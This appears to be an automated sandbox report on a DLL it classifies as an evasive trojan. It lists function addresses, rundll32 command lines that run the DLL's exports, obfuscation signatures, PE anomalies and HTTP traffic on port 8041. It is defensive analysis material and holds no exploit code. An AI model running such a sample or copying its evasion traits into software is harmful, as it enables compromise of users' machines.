Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001DA08	3_2_000000018001DA08
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001EA28	3_2_000000018001EA28
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180033A3C	3_2_0000000180033A3C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001CA80	3_2_000000018001CA80
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001FAC8	3_2_000000018001FAC8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001DB10	3_2_000000018001DB10
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001EB58	3_2_000000018001EB58
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001CB88	3_2_000000018001CB88
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180023B94	3_2_0000000180023B94
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180021B98	3_2_0000000180021B98
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180024BA8	3_2_0000000180024BA8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180032BB8	3_2_0000000180032BB8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180022BBC	3_2_0000000180022BBC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001FBD0	3_2_000000018001FBD0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180042BFC	3_2_0000000180042BFC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180031C08	3_2_0000000180031C08
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001DC18	3_2_000000018001DC18
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001EC60	3_2_000000018001EC60
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180055C62	3_2_0000000180055C62
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001CC90	3_2_000000018001CC90
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180046CAC	3_2_0000000180046CAC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001FD28	3_2_000000018001FD28
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001ED68	3_2_000000018001ED68
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001DD70	3_2_000000018001DD70
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180021D84	3_2_0000000180021D84
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180024D94	3_2_0000000180024D94
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180022DA4	3_2_0000000180022DA4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180023DC4	3_2_0000000180023DC4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018002BDDC	3_2_000000018002BDDC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001CDE8	3_2_000000018001CDE8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001FE30	3_2_000000018001FE30
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001EE70	3_2_000000018001EE70
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001DE74	3_2_000000018001DE74
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180033E98	3_2_0000000180033E98
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001CEF0	3_2_000000018001CEF0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180044F38	3_2_0000000180044F38
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001FF38	3_2_000000018001FF38
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001DF78	3_2_000000018001DF78
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180022F8C	3_2_0000000180022F8C
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180020FA0	3_2_0000000180020FA0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180023FB0	3_2_0000000180023FB0
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180021FB4	3_2_0000000180021FB4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180024FC4	3_2_0000000180024FC4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000000018001EFC8	3_2_000000018001EFC8
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B7929EE	23_2_0000029F3B7929EE
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B7931BE	23_2_0000029F3B7931BE
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000000273F807BE	23_2_0000000273F807BE
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000000273F7FFEE	23_2_0000000273F7FFEE
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8F55C0	23_2_0000029F3B8F55C0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8F16A0	23_2_0000029F3B8F16A0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8F42A0	23_2_0000029F3B8F42A0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B9082A0	23_2_0000029F3B9082A0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8E99D0	23_2_0000029F3B8E99D0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B90B5E0	23_2_0000029F3B90B5E0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B9055E0	23_2_0000029F3B9055E0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B910210	23_2_0000029F3B910210
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B907220	23_2_0000029F3B907220
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B904550	23_2_0000029F3B904550
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8E5D60	23_2_0000029F3B8E5D60
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8F4DB0	23_2_0000029F3B8F4DB0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8FB4E0	23_2_0000029F3B8FB4E0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8FA100	23_2_0000029F3B8FA100
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8E9500	23_2_0000029F3B8E9500
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8F9120	23_2_0000029F3B8F9120
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B911490	23_2_0000029F3B911490
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B90FBC0	23_2_0000029F3B90FBC0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8FCBE0	23_2_0000029F3B8FCBE0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B912812	23_2_0000029F3B912812
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B911F40	23_2_0000029F3B911F40
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B912F60	23_2_0000029F3B912F60
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B902BB0	23_2_0000029F3B902BB0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B9013A3	23_2_0000029F3B9013A3
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8FBED0	23_2_0000029F3B8FBED0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8E66C0	23_2_0000029F3B8E66C0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B9066E0	23_2_0000029F3B9066E0
Source: C:\Windows\System32\rundll32.exe	Code function: 23_2_0000029F3B8EA730	23_2_0000029F3B8EA730
Source: C:\Windows\explorer.exe	Code function: 30_2_089D1A8C	30_2_089D1A8C
Source: C:\Windows\explorer.exe	Code function: 30_2_089D1A7C	30_2_089D1A7C
Source: C:\Windows\explorer.exe	Code function: 30_2_089D2164	30_2_089D2164

Found potential string decryption / allocating functions

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000000018004816C appears 44 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 0000000180001400 appears 56 times

One or more processes crash

Source: C:\Windows\System32\rundll32.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7148 -s 328

Source: classification engine

Classification label: mal100.troj.evad.winDLL@28/25@5/3

Source: C:\Windows\System32\rundll32.exe

Code function: 23_3_00007DF49BA40000 CreateToolhelp32Snapshot,CloseHandle,

23_3_00007DF49BA40000

Source: C:\Windows\System32\rundll32.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7376
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7596
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3648
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3480:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7468
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7620
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7148

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\b0d21df3-edb9-4c03-81a1-5896762c4e04

Jump to behavior

Source: vierm_soft_x64.dll.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Source: C:\Windows\System32\loaddll64.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXA

Source: unknown	Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll"
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7148 -s 328
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3648 -s 316
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXC
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7376 -s 328
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXD
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7468 -s 320
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXA
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXC
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXD
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXS
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",GetDeepDVCState
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7596 -s 324
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7620 -s 320
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXA	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXC	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\vierm_soft_x64.dll.dll,AXD	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXA	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXC	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXD	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",AXS	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",GetDeepDVCState	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\vierm_soft_x64.dll.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: dsrole.dll

Source: C:\Windows\System32\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: vierm_soft_x64.dll.dll

Static PE information: Image base 0x180000000 > 0x60000000

Source: vierm_soft_x64.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: vierm_soft_x64.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: vierm_soft_x64.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: vierm_soft_x64.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: vierm_soft_x64.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: vierm_soft_x64.dll.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: vierm_soft_x64.dll.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: kernel32.pdbUGP source: rundll32.exe, 00000017.00000003.1428461278.0000029F3B7E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdbUGP source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\BUILD\work\b69487f8af4577da\BUILDSENG\Release\x64\ArPotEx64.pdb source: rundll32.exe, 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.1376710622.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.1415603065.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000F.00000002.1417110861.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.1427586345.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000013.00000002.1403034734.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000014.00000002.1428897792.000000018005F000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000017.00000002.2565190812.000000018005F000.00000002.00000001.01000000.00000003.sdmp, vierm_soft_x64.dll.dll
Source:	Binary string: ntdll.pdb source: rundll32.exe, 00000017.00000003.1411626568.0000029F3B7EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernel32.pdb source: rundll32.exe, 00000017.00000003.1428461278.0000029F3B7E1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: rundll32.exe, 00000017.00000003.1411626568.0000029F3B7EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdb source: rundll32.exe, 00000017.00000003.1412218953.0000029F3B8EE000.00000004.00000020.00020000.00000000.sdmp

Source: vierm_soft_x64.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: vierm_soft_x64.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: vierm_soft_x64.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: vierm_soft_x64.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: vierm_soft_x64.dll.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

PE file contains an invalid checksum

Source: vierm_soft_x64.dll.dll

Static PE information: real checksum: 0x81152 should be: 0xbc113

PE file contains sections with non-standard names

Source: vierm_soft_x64.dll.dll	Static PE information: section name: memcpy_
Source: vierm_soft_x64.dll.dll	Static PE information: section name: _RDATA

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\rundll32.exe	Code function: 23_3_0000029F3B7A00D8 push cs; retf	23_3_0000029F3B7A00FD
Source: C:\Windows\explorer.exe	Code function: 30_2_089DEE21 push rsi; ret	30_2_089DEE27
Source: C:\Windows\explorer.exe	Code function: 30_2_089DF5BA push rcx; ret	30_2_089DF5BC
Source: C:\Windows\explorer.exe	Code function: 30_2_089DEF4F push D5912897h; iretq	30_2_089DEF57

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 8041 -> 49797

Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
